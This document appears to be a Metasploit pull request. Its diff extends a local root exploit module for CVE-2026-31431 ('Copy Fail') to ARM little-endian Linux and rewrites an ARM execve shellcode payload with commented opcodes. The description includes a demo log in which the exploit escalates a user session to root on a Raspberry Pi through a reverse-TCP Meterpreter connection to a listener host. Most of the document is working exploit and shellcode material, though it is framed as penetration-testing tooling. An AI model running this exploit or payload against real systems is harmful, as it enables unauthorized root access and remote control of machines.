### PR TITLE
Fix ARMLE exec and add to Copy Fail

### DIFF
--- a/modules/exploits/linux/local/cve_2026_31431_copy_fail.rb
+++ b/modules/exploits/linux/local/cve_2026_31431_copy_fail.rb
@@ -48,8 +48,9 @@ class MetasploitModule < Msf::Exploit::Local
               'Platform' => ['linux', 'unix'],
               'Arch' => ARCH_CMD,
               # Space is constrained due to the max size of the resulting ELF executable (2024 on 6.8.0-79-generic
-              # x86_64, 2036 on 6.6.63-v8+ aarch64) if Metasploit changes the ELF executable size in the future, this
-              # may need to be updated
+              # x86_64, 2036 on 6.6.63-v8+ aarch64, 2028 on 5.15.44-Re4son-v7+ armv7l) if Metasploit changes the ELF
+              # executable size in the future, this may need to be updated. The Space here is the largest size that
+              # yeilds an ELF executable that fits all tested architectures.
               'Payload' => { 'Space' => 1847, 'DisableNops' => true }
             }
           ]
@@ -128,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Local
   def run_command(os_command)
     os_architecture = get_os_architecture
 
-    unless [ ARCH_X64, ARCH_AARCH64 ].include?(os_architecture)
+    unless [ ARCH_X64, ARCH_AARCH64, ARCH_ARMLE ].include?(os_architecture)
       # this is an artificial filter for MVP while the details for the other architectures are worked out and tested.
       fail_with(Failure::NoTarget, "#{os_architecture} targets are not supported.")
     end

--- a/modules/payloads/singles/linux/armle/exec.rb
+++ b/modules/payloads/singles/linux/armle/exec.rb
@@ -3,16 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-###
-#
-# Exec
-# ----
-#
-# Executes an arbitrary command.
-#
-###
 module MetasploitModule
-  CachedSize = 29
+  CachedSize = 24
 
   include Msf::Payload::Single
   include Msf::Payload::Linux::Armle::Prepends
@@ -22,25 +14,60 @@ module MetasploitModule
       merge_info(
         info,
         'Name' => 'Linux Execute Command',
-        'Description' => 'Execute an arbitrary command',
-        'Author' => 'Jonathan Salwan',
+        'Description' => 'Execute an arbitrary command or just a /bin/sh shell',
+        'Author' => [
+          'Jonathan Salwan',
+          'Spencer McIntyre'
+        ],
         'License' => MSF_LICENSE,
         'Platform' => 'linux',
         'Arch' => ARCH_ARMLE
       )
     )
 
-    register_options(
-      [
-        OptString.new('CMD', [ true, 'The command string to execute' ]),
-      ]
-    )
+    register_options([
+      OptString.new('CMD', [ false, 'The command string to execute' ]),
+    ])
   end
 
   def generate(_opts = {})
     cmd = datastore['CMD'] || ''
 
-    "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0a\x30" \
-      "\x01\x90\x01\xa9\x92\x1a\x0b\x27\x01\xdf" + cmd
+    if cmd.empty?
+      # execve("/bin/sh", NULL, NULL)
+      shellcode = [
+        0xe28f000c, # add r0, pc, #12
+        0xe3a01000, # mov r1, #0
+        0xe3a02000, # mov r2, #0
+        0xe3a0700b, # mov r7, #11   # __NR_execve
+        0xef000000  # svc 0
+      ].pack('V*')
+      shellcode += "/bin/sh\x00"
+    else
+      # execve("/bin/sh", ["/bin/sh", "-c", CMD, NULL], NULL)
+      shellcode = [
+        0xe0244004, # eor r4, r4, r4
+        0xe92d0010, # push {r4}              ; argv[3] = NULL
+        0xe28f4030, # add r4, pc, #48        ; r4 = &cmd
+        0xe92d0010, # push {r4}              ; argv[2] = &cmd
+        0xe28f4024, # add r4, pc, #36        ; r4 = &"-c"
+        0xe92d0010, # push {r4}              ; argv[1] = &"-c"
+        0xe28f4014, # add r4, pc, #20        ; r4 = &"/bin/sh"
+        0xe92d0010, # push {r4}              ; argv[0] = &"/bin/sh"
+        0xe1a0100d, # mov r1, sp
+        0xe28f0008, # add r0, pc, #8         ; r0 = &"/bin/sh"
+        0xe3a02000, # mov r2, #0
+        0xe3a0700b, # mov r7, #11            ; __NR_execve
+        0xef000000  # svc 0
+      ].pack('V*')
+      shellcode += "/bin/sh\x00"
+      shellcode += "-c\x00\x00"
+      shellcode += cmd + "\x00"
+    end
+
+    # align our shellcode to 4 bytes
+    shellcode += "\x00" while shellcode.bytesize % 4 != 0
+
+    super.to_s + shellcode
   end
 end


### PR DESCRIPTION
This updates the linux/armle/exec payload and adds it as a supported architecture to the new Copy Fail exploit.

Payload changes include:
* It's now in the same modern style as other where the opcodes are commented
* CMD is optional, allowing the shellcode to directly invoke `/bin/sh` or run the command through it when specified making it more flexible
* Fixed a bug where the old 22-byte stub did execve(CMD, [CMD, <uninit stack>], NULL) - argv was left unterminated, CMD treated as the literal exe path with no shell parsing, and CMD never NUL-terminated. Anything beyond a single absolute-path binary failed.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Establish a session against an ARMLE target
- [ ] Use Copy Fail and see it get you `root` access

## Demo

```
msf exploit(linux/local/cve_2026_31431_copy_fail) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: kali
meterpreter > background 
[*] Backgrounding session 1...
msf exploit(linux/local/cve_2026_31431_copy_fail) > set SESSION -1
SESSION => -1
msf exploit(linux/local/cve_2026_31431_copy_fail) > show options 

Module options (exploit/linux/local/cve_2026_31431_copy_fail):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  -1               yes       The session to run this module on


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.3.11     yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux Command



View the full module info with the info, or info -d command.

msf exploit(linux/local/cve_2026_31431_copy_fail) > run VERBOSE=true
[*] Started reverse TCP handler on 192.168.3.11:5555 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using 'python' on the remote target.
[+] The exploit socket has been created, encryption primitives are available.
[*] Generated a 164 byte ELF executable...
[*] Triggering the vulnerability using Python...
[+] The target is vulnerable.
[*] Generated a 688 byte ELF executable...
[*] Triggering the vulnerability using Python...
[*] Sending stage (23484 bytes) to 10.5.132.212
[*] Meterpreter session 4 opened (192.168.3.11:5555 -> 10.5.132.212:59572) at 2026-04-30 20:08:35 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : kali-raspberrypi
OS           : Linux 5.15.44-Re4son-v7+ #1 SMP Debian kali-pi (2022-07-03)
Architecture : armv7l
Meterpreter  : python/linux
meterpreter >
```
